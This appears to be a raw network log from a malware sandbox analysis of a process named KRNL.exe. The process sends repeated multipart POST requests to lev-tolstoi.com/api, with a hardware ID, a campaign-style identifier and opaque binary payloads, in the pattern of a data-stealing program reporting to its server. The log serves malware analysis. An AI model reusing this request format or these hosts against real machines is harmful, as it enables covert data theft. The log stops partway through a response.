2025-01-01 20:28:01 UTC | 250 | IN | Data Raw: 31 63 63 33 0d 0a 6c 4b 6e 61 79 65 76 32 72 4f 38 78 79 54 6d 4e 50 70 6f 4c 39 62 55 37 70 46 58 75 4b 68 59 55 46 31 51 39 36 70 71 46 43 70 50 76 69 36 7a 72 30 63 4b 41 7a 55 4b 73 47 37 64 4b 36 48 36 51 6d 52 6e 46 4d 63 77 51 63 48 56 37 4a 31 6a 47 75 50 4e 6e 73 61 37 50 75 36 57 59 6b 34 44 4e 56 4c 45 62 74 32 58 68 4b 5a 44 62 47 5a 35 33 69 30 42 30 64 58 73 32 58 49 48 31 39 57 62 77 2f 4d 57 39 6f 59 36 56 79 49 35 64 70 46 7a 6f 57 2f 74 68 6d 39 78 57 7a 44 6a 4d 42 6a 52 78 62 58 59 48 79 4e 66 67 66 76 4c 5a 79 4b 6d 69 79 59 75 41 6c 42 4f 73 56 36 38 45 75 47 71 51 31 31 66 43 4d 59 56 43 66 6e 78 7a 4e 31 6d 41 36 75 78 73 2b 2f 7a 4c 76 71 43 45 6e 4e 79 44 56 36 4e 58 37 6c 48 37 4b 64 6d 58 58 74 35 33 31 41 67 6e
Data Ascii: 1cc3lKnayev2rO8xyTmNPpoL9bU7pFXuKhYUF1Q96pqFCpPvi6zr0cKAzUKsG7dK6H6QmRnFMcwQcHV7J1jGuPNnsa7Pu6WYk4DNVLEbt2XhKZDbGZ53i0B0dXs2XIH19Wbw/MW9oY6VyI5dpFzoW/thm9xWzDjMBjRxbXYHyNfgfvLZyKmiyYuAlBOsV68EuGqQ11fCMYVCfnxzN1mA6uxs+/zLvqCEnNyDV6NX7lH7KdmXXt531Agn
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 52 48 59 6e 54 70 33 31 39 32 36 78 36 59 57 68 36 34 36 59 6a 74 55 54 6f 31 66 68 57 66 74 6d 6b 4e 5a 5a 31 44 69 4d 53 33 78 2b 63 54 78 51 68 2f 66 70 59 76 62 2b 77 72 2b 6b 6a 70 7a 49 67 6c 44 72 46 61 39 62 34 43 6e 50 6c 33 6e 57 4e 49 39 63 65 57 63 31 4b 52 47 52 75 4f 42 6b 73 61 36 4c 76 71 57 49 6d 63 36 66 57 36 42 51 36 6b 37 7a 59 4a 72 61 57 63 73 39 67 30 74 30 63 58 38 38 55 49 4c 38 36 6d 58 33 39 73 76 34 35 63 6d 54 31 73 30 4c 36 33 6a 71 54 50 39 6c 67 5a 56 6a 68 69 6a 43 55 54 52 78 65 58 59 48 79 50 44 69 61 2f 4c 39 78 4c 75 6a 67 6f 62 4f 6e 31 57 6d 58 76 31 61 2f 57 65 64 31 45 76 4d 4f 59 70 4c 66 58 31 38 4d 31 69 4d 75 4b 6b 6f 39 75 36 4c 34 4f 75 6f 6d 63 57 42 57 62 78 62 72 30 4f 32 63 4e 66 51 56 59 5a 76 7a 45 78
Data Ascii: RHYnTp31926x6YWh646YjtUTo1fhWftmkNZZ1DiMS3x+cTxQh/fpYvb+wr+kjpzIglDrFa9b4CnPl3nWNI9ceWc1KRGRuOBksa6LvqWImc6fW6BQ6k7zYJraWcs9g0t0cX88UIL86mX39sv45cmT1s0L63jqTP9lgZVjhijCUTRxeXYHyPDia/L9xLujgobOn1WmXv1a/Wed1EvMOYpLfX18M1iMuKko9u6L4OuomcWBWbxbr0O2cNfQVYZvzEx
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 42 2b 50 34 4b 63 77 73 64 7a 49 72 4b 69 44 31 76 75 4f 58 61 56 63 2b 52 7a 6e 4a 34 36 58 58 73 70 33 31 41 68 35 64 33 30 77 54 59 66 31 35 47 62 2f 2b 63 36 33 6f 34 6d 55 77 34 68 58 6f 46 44 73 55 66 78 37 6e 64 64 52 77 7a 61 47 51 6a 51 34 4e 54 46 48 79 4b 43 6e 57 65 62 39 69 59 32 6f 68 35 72 4a 6d 78 4f 30 46 66 59 63 2f 32 58 58 6a 78 6e 4c 50 34 6c 4e 65 33 64 2f 4f 46 71 43 39 4f 39 6d 38 75 54 45 76 4b 75 46 6e 4d 53 41 58 61 39 54 35 6c 66 7a 62 35 66 57 55 34 5a 35 7a 45 39 73 4e 69 31 32 61 34 2f 30 36 6d 65 7a 77 38 69 32 70 59 36 43 6a 70 49 64 73 68 76 6f 55 4c 67 78 31 39 74 51 78 6a 79 47 54 48 52 78 65 44 4e 63 6a 2f 76 71 62 2f 76 34 7a 4c 79 6e 67 4a 6e 49 6a 56 53 76 58 76 31 5a 38 57 57 62 6c 78 65 47 4d 4a 51 49 4c 44 5a 61
Data Ascii: B+P4KcwsdzIrKiD1vuOXaVc+RznJ46XXsp31Ah5d30wTYf15Gb/+c63o4mUw4hXoFDsUfx7nddRwzaGQjQ4NTFHyKCnWeb9iY2oh5rJmxO0FfYc/2XXjxnLP4lNe3d/OFqC9O9m8uTEvKuFnMSAXa9T5lfzb5fWU4Z5zE9sNi12a4/06mezw8i2pY6CjpIdshvoULgx19tQxjyGTHRxeDNcj/vqb/v4zLyngJnIjVSvXv1Z8WWblxeGMJQILDZa
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 43 6e 59 66 6a 6b 78 62 61 69 68 4a 4c 47 69 6c 32 6d 55 4f 6c 58 2f 32 36 52 32 6c 48 4c 4d 6f 39 4a 63 48 78 6e 4e 56 53 43 39 65 30 6f 76 37 62 4d 6f 4f 76 52 31 4f 6d 42 65 72 74 41 2f 55 71 34 64 74 6e 4f 47 63 45 37 7a 42 41 30 64 58 6f 2f 55 49 44 77 36 47 66 31 2b 4d 32 2b 70 6f 79 62 78 4a 39 62 70 56 62 6b 55 2f 4e 37 6c 39 70 64 79 6a 4f 45 51 33 34 32 4f 33 5a 59 6b 4c 69 2f 4b 4d 54 37 78 4c 69 6f 6e 39 54 52 77 30 72 72 58 4f 4d 63 6f 43 6d 62 32 56 6e 4a 4f 34 42 44 66 48 64 35 4f 46 69 4e 38 65 39 67 34 2f 66 50 73 4b 71 48 6d 38 2b 4a 56 71 35 66 36 46 6a 2b 5a 74 65 5a 47 63 45 76 7a 42 41 30 57 56 49 44 48 61 6e 43 70 33 65 2f 37 34 75 2f 70 38 6e 4d 6a 6f 46 51 70 31 50 67 57 76 46 6c 6e 64 35 53 79 6a 79 49 52 48 31 7a 63 7a 64 61 6a
Data Ascii: CnYfjkxbaihJLGil2mUOlX/26R2lHLMo9JcHxnNVSC9e0ov7bMoOvR1OmBertA/Uq4dtnOGcE7zBA0dXo/UIDw6Gf1+M2+poybxJ9bpVbkU/N7l9pdyjOEQ342O3ZYkLi/KMT7xLion9TRw0rrXOMcoCmb2VnJO4BDfHd5OFiN8e9g4/fPsKqHm8+JVq5f6Fj+ZteZGcEvzBA0WVIDHanCp3e/74u/p8nMjoFQp1PgWvFlnd5SyjyIRH1zczdaj
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 34 35 4d 57 31 70 49 47 63 78 34 78 58 72 6c 62 70 55 50 4a 6f 6b 4e 6c 58 7a 6e 66 43 43 48 4e 75 4e 57 34 66 71 65 6a 38 65 75 66 37 36 72 57 6b 79 59 75 41 6c 42 4f 73 56 36 38 45 75 47 43 46 30 31 54 55 50 6f 74 47 65 33 56 6e 4e 31 4b 44 36 75 42 6e 39 66 48 48 76 71 53 50 6c 63 75 48 58 36 78 65 35 46 50 30 4b 64 6d 58 58 74 35 33 31 41 68 61 66 57 59 68 58 49 62 7a 38 58 4f 78 36 59 57 68 36 34 36 59 6a 74 55 54 71 46 44 6b 57 50 68 6c 6c 39 4e 55 78 69 57 44 54 33 4e 2f 66 69 52 56 6a 2f 2f 73 59 50 72 35 7a 61 71 6e 68 34 62 4c 6e 30 48 72 46 61 39 62 34 43 6e 50 6c 32 2f 42 4a 35 78 4c 4e 6b 64 6a 4e 55 6d 44 39 65 73 6f 37 72 6a 53 2b 4b 79 46 31 4a 62 4e 56 61 52 53 37 46 50 35 59 4a 76 61 58 4d 38 79 6a 55 35 77 66 48 38 32 57 59 37 35 34 6d
Data Ascii: 45MW1pIGcx4xXrlbpUPJokNlXznfCCHNuNW4fqej8euf76rWkyYuAlBOsV68EuGCF01TUPotGe3VnN1KD6uBn9fHHvqSPlcuHX6xe5FP0KdmXXt531AhafWYhXIbz8XOx6YWh646YjtUTqFDkWPhll9NUxiWDT3N/fiRVj//sYPr5zaqnh4bLn0HrFa9b4CnPl2/BJ5xLNkdjNUmD9eso7rjS+KyF1JbNVaRS7FP5YJvaXM8yjU5wfH82WY754m
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 74 4f 76 52 31 4d 32 4b 55 4b 70 52 35 6c 44 33 62 70 50 46 55 38 45 6c 6a 55 6c 2f 65 33 6b 32 55 6f 58 79 35 6d 48 38 2b 73 61 2f 72 49 61 52 6a 73 4d 54 72 45 4f 76 42 4c 68 49 6d 74 78 56 6e 57 33 4d 56 7a 70 76 4e 54 46 54 79 4b 43 6e 61 50 76 7a 77 62 57 6f 68 70 66 63 6a 46 57 35 57 2b 4a 57 36 6d 4f 63 30 6c 54 4c 4f 6f 39 4f 63 6e 31 35 4a 46 61 49 2b 2b 77 6f 76 37 62 4d 6f 4f 76 52 31 4f 32 61 52 61 46 63 34 30 72 7a 61 4a 54 42 56 4e 5a 33 77 67 68 6c 63 57 52 32 42 35 37 6f 38 47 2f 75 75 4e 4c 34 72 49 58 55 6c 73 31 56 6f 6c 33 6f 57 76 5a 37 6b 74 46 57 79 54 36 46 54 48 78 31 64 54 4a 62 6a 2f 33 6b 5a 50 72 78 79 4c 65 76 67 4a 72 48 67 68 50 6c 47 2b 68 45 75 44 48 58 39 6b 4c 46 4f 34 45 49 61 7a 68 73 64 6c 69 45 75 4c 38 6f 2f 66 6a
Data Ascii: tOvR1M2KUKpR5lD3bpPFU8EljUl/e3k2UoXy5mH8+sa/rIaRjsMTrEOvBLhImtxVnW3MVzpvNTFTyKCnaPvzwbWohpfcjFW5W+JW6mOc0lTLOo9Ocn15JFaI++wov7bMoOvR1O2aRaFc40rzaJTBVNZ3wghlcWR2B57o8G/uuNL4rIXUls1Vol3oWvZ7ktFWyT6FTHx1dTJbj/3kZPrxyLevgJrHghPlG+hEuDHX9kLFO4EIazhsdliEuL8o/fj
2025-01-01 20:28:01 UTC | 276 | IN | Data Raw: 35 48 4a 6d 78 47 65 57 4f 46 53 2f 33 2f 58 79 47 61 49 64 34 4e 53 4e 43 35 4d 4c 78 2b 50 39 4b 63 77 73 65 50 4d 75 4b 79 54 67 73 6d 42 51 71 42 57 34 33 37 33 62 6f 48 55 56 73 55 6d 68 51 52 2f 65 7a 56 34 48 34 2f 67 70 7a 43 78 32 63 79 75 71 4b 61 58 33 34 51 54 35 52 76 6f 53 72 67 78 31 2b 6b 5a 31 44 53 63 53 33 74 6e 53 33 59 48 6b 63 61 6e 59 2b 66 78 32 37 75 39 67 70 6e 43 6e 47 33 72 41 37 73 4f 71 6a 76 46 68 55 61 47 4b 4c 4d 47 4e 48 63 31 62 6d 61 52 75 50 45 6f 71 61 53 46 2b 4c 6e 4a 7a 49 37 4b 55 4c 6c 4a 36 56 2f 75 61 74 44 70 5a 2b 45 68 68 6b 39 6b 63 57 49 35 48 38 61 34 36 43 69 70 7a 34 75 78 72 4a 4b 46 32 49 42 44 72 42 76 51 45 72 68 78 31 34 38 5a 38 7a 53 43 52 6e 4e 67 5a 48 74 34 6e 76 4c 67 65 50 62 68 78 50 6a 6c
Data Ascii: 5HJmxGeWOFS/3/XyGaId4NSNC5MLx+P9KcwsePMuKyTgsmBQqBW4373boHUVsUmhQR/ezV4H4/gpzCx2cyuqKaX34QT5RvoSrgx1+kZ1DScS3tnS3YHkcanY+fx27u9gpnCnG3rA7sOqjvFhUaGKLMGNHc1bmaRuPEoqaSF+LnJzI7KULlJ6V/uatDpZ+Ehhk9kcWI5H8a46Cipz4uxrJKF2IBDrBvQErhx148Z8zSCRnNgZHt4nvLgePbhxPjl
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 32 63 64 31 0d 0a 54 5a 4e 73 59 4a 6d 6b 37 4c 78 2b 65 75 4c 38 36 76 37 62 5a 2b 50 50 4a 30 38 32 66 51 61 31 59 2b 56 2b 2f 56 36 6e 77 51 38 73 78 6d 31 6c 4b 53 48 49 73 55 6f 37 76 39 69 54 6b 39 63 57 32 72 4a 2f 55 67 4d 31 63 36 77 50 57 48 4c 41 70 71 4a 6b 5a 33 6e 66 55 43 45 46 31 65 7a 68 59 6e 75 6d 71 54 2b 76 37 7a 61 2b 36 79 64 71 4f 69 78 50 7a 43 61 45 63 2f 48 6a 58 6a 77 6d 55 62 4e 6b 62 49 79 59 6e 4b 52 47 52 75 50 45 6f 71 61 53 46 2b 4c 6e 4a 7a 49 37 4b 55 4c 6c 4a 36 56 2f 75 61 74 44 70 5a 2b 67 77 69 6b 31 7a 5a 6a 63 59 56 4a 7a 2f 70 79 61 78 2b 59 76 67 6b 73 6e 63 6a 72 49 64 36 30 4f 76 42 4c 68 63 6c 4e 6c 58 77 53 47 64 42 56 70 78 63 7a 4e 59 6d 4c 72 4a 59 2b 58 78 69 2f 62 72 6a 39 53 57 33 52 33 72 58 2f 34 63
Data Ascii: 2cd1TZNsYJmk7Lx+euL86v7bZ+PPJ082fQa1Y+V+/V6nwQ8sxm1lKSHIsUo7v9iTk9cW2rJ/UgM1c6wPWHLApqJkZ3nfUCEF1ezhYnumqT+v7za+6ydqOixPzCaEc/HjXjwmUbNkbIyYnKRGRuPEoqaSF+LnJzI7KULlJ6V/uatDpZ+gwik1zZjcYVJz/pyax+YvgksncjrId60OvBLhclNlXwSGdBVpxczNYmLrJY+Xxi/brj9SW3R3rX/4c
2025-01-01 20:28:01 UTC | 1369 | IN | Data Raw: 5a 50 31 69 43 44 64 6b 70 6a 64 6a 68 52 6a 2b 37 32 4b 4c 2b 32 78 50 6a 7a 73 4e 53 47 7a 57 7a 6c 47 2f 63 63 6f 43 6d 69 31 46 66 49 4d 4a 70 5a 4f 56 46 37 4d 56 36 65 36 50 42 6e 73 62 69 4c 76 75 76 52 78 6f 44 4e 56 37 6f 62 74 77 79 71 4d 73 4b 45 44 70 5a 6c 6b 77 5a 74 4e 6d 4e 32 42 39 71 32 70 33 71 78 72 6f 76 2f 71 4a 75 47 79 49 35 46 71 42 7a 52 59 74 39 6e 6b 4e 5a 50 31 69 43 44 42 31 70 41 56 41 68 68 6e 66 76 70 5a 76 62 67 32 76 6a 6c 79 5a 75 4f 31 57 72 72 45 36 39 6a 74 69 6d 50 6c 77 47 47 41 6f 39 47 65 6e 46 6a 4a 78 4b 76 39 75 42 70 35 2b 62 63 74 2b 53 6e 6f 75 2f 4e 48 65 74 64 72 77 53 71 4a 39 66 54 53 49 5a 76 33 42 6f 76 49 79 5a 68 44 39 72 6e 71 58 47 78 34 49 76 67 2b 63 66 55 33 4d 30 4c 36 78 7a 73 54 75 70 76 6c
Data Ascii: ZP1iCDdkpjdjhRj+72KL+2xPjzsNSGzWzlG/ccoCmi1FfIMJpZOVF7MV6e6PBnsbiLvuvRxoDNV7obtwyqMsKEDpZlkwZtNmN2B9q2p3qxrov/qJuGyI5FqBzRYt9nkNZP1iCDB1pAVAhhnfvpZvbg2vjlyZuO1WrrE69jtimPlwGGAo9GenFjJxKv9uBp5+bct+Snou/NHetdrwSqJ9fTSIZv3BovIyZhD9rnqXGx4Ivg+cfU3M0L6xzsTupvl


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49736        172.67.157.254  443               2120  C:\Users\user\Desktop\KRNL.exe

Timestamp                Bytes  Direction  Data
2025-01-01 20:28:02 UTC  277    OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=LC4OYBSII4ZCJL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18143
    Host: lev-tolstoi.com
2025-01-01 20:28:02 UTC  15331  OUT
    Data Raw: 2d 2d 4c 43 34 4f 59 42 53 49 49 34 5a 43 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 4c 43 34 4f 59 42 53 49 49 34 5a 43 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 43 34 4f 59 42 53 49 49 34 5a 43 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 4c 43 34 4f
    Data Ascii (CRLF restored from the raw bytes):
    --LC4OYBSII4ZCJL
    Content-Disposition: form-data; name="hwid"

    3BD251238DC531F1BCFD68B774EF9B7A
    --LC4OYBSII4ZCJL
    Content-Disposition: form-data; name="pid"

    2
    --LC4OYBSII4ZCJL
    Content-Disposition: form-data; name="lid"

    yau6Na--629912535
    --LC4O
2025-01-01 20:28:02 UTC  2812   OUT
    Data Raw: cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f
    Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
2025-01-01 20:28:02 UTC  1133   IN
    HTTP/1.1 200 OK
    Date: Wed, 01 Jan 2025 20:28:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=gevvbbecklc65a9gs72ch49gvk; expires=Sun, 27 Apr 2025 14:14:41 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TiICTtXeblM4%2B9Z%2BSDyMH5vd4XBGXeOlgAQa%2FfqFA9hk6SYP3A1EfigCgEmKatr0mVhr%2B5VpjmyXpEcB5PVY1SLR%2Bf82eTOdQlpElbZ9B0Fx%2BdEpO6NGZi8837kuhcVax3I%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fb540e2ff54727a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=1984&rtt_var=778&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19100&delivery_rate=1471774&cwnd=221&unsent_bytes=0&cid=ecb171dae250f74b&ts=643&x=0"
2025-01-01 20:28:02 UTC  20     IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (CRLF restored; "f" is the hex chunk size, 15 bytes):
    f
    ok 8.46.123.189
2025-01-01 20:28:02 UTC  5      IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii (CRLF restored; zero-length chunk terminating the body):
    0



Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49737        172.67.157.254  443               2120  C:\Users\user\Desktop\KRNL.exe

Timestamp                Bytes  Direction  Data
2025-01-01 20:28:03 UTC  274    OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=GGAL4P5RZVZH
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8752
    Host: lev-tolstoi.com
2025-01-01 20:28:03 UTC  8752   OUT
    Data Raw: 2d 2d 47 47 41 4c 34 50 35 52 5a 56 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 47 47 41 4c 34 50 35 52 5a 56 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 47 41 4c 34 50 35 52 5a 56 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 47 47 41 4c 34 50 35 52 5a 56
    Data Ascii (CRLF restored from the raw bytes):
    --GGAL4P5RZVZH
    Content-Disposition: form-data; name="hwid"

    3BD251238DC531F1BCFD68B774EF9B7A
    --GGAL4P5RZVZH
    Content-Disposition: form-data; name="pid"

    2
    --GGAL4P5RZVZH
    Content-Disposition: form-data; name="lid"

    yau6Na--629912535
    --GGAL4P5RZV
2025-01-01 20:28:04 UTC  1127   IN
    HTTP/1.1 200 OK
    Date: Wed, 01 Jan 2025 20:28:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=69q3plhb3svlvu2ldspu9m701n; expires=Sun, 27 Apr 2025 14:14:42 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9GTZ86uugcl9VSkgOvjTyjdKjN5XShMb3ZzU%2BcT%2BmW%2F6F1bcmwxDaT1ZPWtlMhuMtnjeaCYU%2BplDtqaANL88ngPiUo6WDwPqYg9xduVTGB5WU4untw8q1GhWQqxykVh2bow%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fb540ea3981439f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1703&rtt_var=665&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9684&delivery_rate=1614151&cwnd=241&unsent_bytes=0&cid=cc425af5f37f61fd&ts=793&x=0"
2025-01-01 20:28:04 UTC  20     IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (CRLF restored; "f" is the hex chunk size, 15 bytes):
    f
    ok 8.46.123.189
2025-01-01 20:28:04 UTC  5      IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii (CRLF restored; zero-length chunk terminating the body):
    0



Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49738        172.67.157.254  443               2120  C:\Users\user\Desktop\KRNL.exe

Timestamp                Bytes  Direction  Data
2025-01-01 20:28:04 UTC  280    OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2SZAJ2DN9HSSBMB80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20435
    Host: lev-tolstoi.com
2025-01-01 20:28:04 UTC  15331  OUT
    Data Raw: 2d 2d 32 53 5a 41 4a 32 44 4e 39 48 53 53 42 4d 42 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 32 53 5a 41 4a 32 44 4e 39 48 53 53 42 4d 42 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 53 5a 41 4a 32 44 4e 39 48 53 53 42 4d 42 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33
    Data Ascii (CRLF restored from the raw bytes):
    --2SZAJ2DN9HSSBMB80
    Content-Disposition: form-data; name="hwid"

    3BD251238DC531F1BCFD68B774EF9B7A
    --2SZAJ2DN9HSSBMB80
    Content-Disposition: form-data; name="pid"

    3
    --2SZAJ2DN9HSSBMB80
    Content-Disposition: form-data; name="lid"

    yau6Na--62991253
2025-01-01 20:28:04 UTC  5104   OUT
    Data Raw: 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00
    Data Ascii: `M?lrQMn 64F6(X&7~`aO
2025-01-01 20:28:05 UTC  1122   IN
    HTTP/1.1 200 OK
    Date: Wed, 01 Jan 2025 20:28:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=00tkbfdvnspm3q1m15dpa8l50s; expires=Sun, 27 Apr 2025 14:14:44 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
